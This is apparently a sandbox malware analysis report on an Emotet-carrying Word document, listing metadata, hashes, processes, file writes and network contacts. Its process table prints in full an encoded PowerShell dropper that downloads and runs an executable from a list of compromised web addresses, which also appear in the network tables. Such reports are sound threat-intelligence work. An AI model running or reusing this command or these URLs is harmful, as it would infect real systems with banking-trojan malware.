File name: | 081443952688306196.doc |
Full analysis: | https://app.any.run/tasks/e69610ef-8240-4826-a3ee-f4a5f25e6e8a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 07:54:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Incredible Soft Computer, Subject: Burgs, Author: Humberto Lockman, Keywords: Automotive & Kids, Comments: Poland, Template: Normal.dotm, Last Saved By: Alicia Bernhard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 13:56:00 2019, Last Saved Time/Date: Fri Oct 11 13:56:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0 |
MD5: | AB619F85278DAF9465EE88A105ED5A7A |
SHA1: | 3E15D236C66998B7EA5C375E850BC48389D4A2D0 |
SHA256: | BB8D98721DCBA1D7FC8E745496A527247FB563DE48207541A7AC36299AF79DA5 |
SSDEEP: | 6144:oGTmkq2KUzSznLx36rRnQnT2PxQdDYsz3coF0HWz46H:oGTmkqLUGzt36s2Cd8sb5F00R |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Incredible Soft Computer |
---|---|
Subject: | Burgs |
Author: | Humberto Lockman |
Keywords: | Automotive & Kids |
Comments: | Poland |
Template: | Normal.dotm |
LastModifiedBy: | Alicia Bernhard |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:11 12:56:00 |
ModifyDate: | 2019:10:11 12:56:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 170 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | McClure Group |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 198 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Bartell |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2196 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\081443952688306196.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3756 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMgA1AHgANQBjADkAYwAwADAAMAA9ACcAeAA0AHgAYwBiADEAMAAwADMAeAAzADMAJwA7ACQAYwB4AGMAMgAwAGIAYwB4AGMAOQAwADUANgAgAD0AIAAnADcAMwAyACcAOwAkAHgAMAAzAGMAMwA1ADAANwA2AHgAMwAwADMAPQAnAGMAMQAwADUAYgAzADAAMwA1ADMAOQAnADsAJABjADkANQBjADUAMAA5ADAAMAA3ADAAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYwB4AGMAMgAwAGIAYwB4AGMAOQAwADUANgArACcALgBlAHgAZQAnADsAJAB4AGIAOQAwADcAMAB4ADAANwA5AHgAeAA9ACcAYgBjADkANQA0ADAAeAB4AGIANwAxADUANAAnADsAJABiAHgAMAAxADYAOQAwADkAMgA2ADAAMAB4AD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBCAGMAbABpAEUAbgBUADsAJABjADMANQA0ADIAMAA2ADEAMABjADMANQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AaQBrAGUAdgBpAHIAZABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAGkAMgBjADcAMQAzADEALwAqAGgAdAB0AHAAOgAvAC8AcgB1AHAAZQByAHQAcwBoAGUAcgB3AG8AbwBkAC4AYwBvAG0ALwBUAGUAbQBwAGwAYQB0AGUAcwAvAHkAdQBnADkAZABwAG8AOQA4ADEANQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAG8AYgBsAGUAcwBwAHIAbwBwAGUAcgB0AGkAZQBzAC4AYwBvAG0ALwBjAGEAbABlAG4AZABhAHIALwB3ADQAZAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAZQBuAGUAZABvAGwAbABzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGcAcgBhAGQAZQAvADIAbABvAGcANgAzADgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBrAHkAegBvAGMAbwBsAGwAZQBjAHQAaQBvAG4ALgBjAG8AbQAvAHYAZQBnAGsALwBwAGEAcABrAGEAYQAxADcALwBoAGIAOQAyADgANwAyADkAOQA3AC8AJwAuACIAcwBwAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAGMAMAA4ADgAMgAzADQAMgA3AGMANAAwAD0AJwBiADkANAAwADYANQBjADAAMAAyAHgANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA1ADgAMQB4ADEAMABjADAAMAA3ADAAIABpAG4AIAAkAGMAMwA1ADQAMgAwADYAMQAwAGMAMwA1ACkAewB0AHIAeQB7ACQAYgB4ADAAMQA2ADkAMAA5ADIANgAwADAAeAAuACIAZABgAE8AdwBuAGwATwBgAEEAZABGAEkATABFACIAKAAkAHgANQA4ADEAeAAxADAAYwAwADAANwAwACwAIAAkAGMAOQA1AGMANQAwADkAMAAwADcAMAAwACkAOwAkAHgANgBjADcAMAAyADkAMAA0ADQAeAA2AGIAPQAnAGIAeAAwADgAOQA3ADAAMAA4ADAAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAGMAOQA1AGMANQAwADkAMAAwADcAMAAwACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAyADkAOQA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQBSAHQAIgAoACQAYwA5ADUAYwA1ADAAOQAwADAANwAwADAAKQA7ACQAYgA4ADAAYgA1AGMAYgAwADAAMQB4ADgANgA9ACcAYwB4ADMAMgA4ADYAMQAxADAANgAzACcAOwBiAHIAZQBhAGsAOwAkAGIAOQB4ADAANwB4AHgAOQAyADQAOAA4AHgAPQAnAGIANwBiAHgANgAwADAAMAA0ADEANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADAANwBiADAANAA1AGIAYwAxAHgAPQAnAHgANQA4ADkAOAA4AGMAeAA4ADEANQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA841.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWRS56Q9S5B73T3EDF5S.temp | — | |
MD5:— | SHA256:— | |||
2196 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D32FE9CCFDD5F4E2F610BED8E03EA74F | SHA256:9C96E463C3A65E7369EFC57B07E79A2A6CA7C423EEAC18FED21DEAD7C91F9659 | |||
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62CAA03C.wmf | wmf | |
MD5:4463C8C5F739916086FD62D95128D2A9 | SHA256:4A1AEFDF3CFBEDA55DD0E6E6671B6C27BCC8646BDFD671EFCBA80AAFEF294868 | |||
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A92BDAA.wmf | wmf | |
MD5:35AC228007D08827B1B317C395394F4C | SHA256:6E0CF1443FABEE68B9C46DF35092513FC1D63FC43827F9C69649CCC789F47293 | |||
2196 | WINWORD.EXE | C:\Users\admin\Desktop\~$1443952688306196.doc | pgc | |
MD5:80166867D200E41CE14BE44FE3113282 | SHA256:0885C595ACCE28664C685CFD0F90C9E95F087692C9D3C279519393D0486CB4DB | |||
2196 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\081443952688306196.doc.LNK | lnk | |
MD5:7251B23E0C784B4AE867671CC8EC7804 | SHA256:4125574192F3EF62448658DC4E3E12FD971F99A6D6B73EA036B96CB0D55316C3 | |||
3756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FCAF5114.wmf | wmf | |
MD5:61EF43A584A06CAFB5E9F44852068830 | SHA256:632CA48E3027F6C3BFBF318624607AA812A56CAB65043E20BA3036443691A01F | |||
3756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39bdcc.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3756 | powershell.exe | GET | — | 45.56.100.50:80 | http://www.denedolls.com/wp-content/upgrade/2log638/ | US | — | — | malicious |
3756 | powershell.exe | GET | 404 | 77.92.74.183:80 | http://rupertsherwood.com/Templates/yug9dpo98155/ | GB | html | 315 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3756 | powershell.exe | 77.92.74.183:80 | rupertsherwood.com | UK-2 Limited | GB | suspicious |
3756 | powershell.exe | 107.180.27.177:443 | www.noblesproperties.com | GoDaddy.com, LLC | US | unknown |
3756 | powershell.exe | 45.56.100.50:80 | www.denedolls.com | Linode, LLC | US | unknown |
3756 | powershell.exe | 160.153.93.130:80 | www.mikevirdi.com | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.mikevirdi.com |
| malicious |
dns.msftncsi.com |
| shared |
rupertsherwood.com |
| unknown |
www.noblesproperties.com |
| unknown |
www.denedolls.com |
| malicious |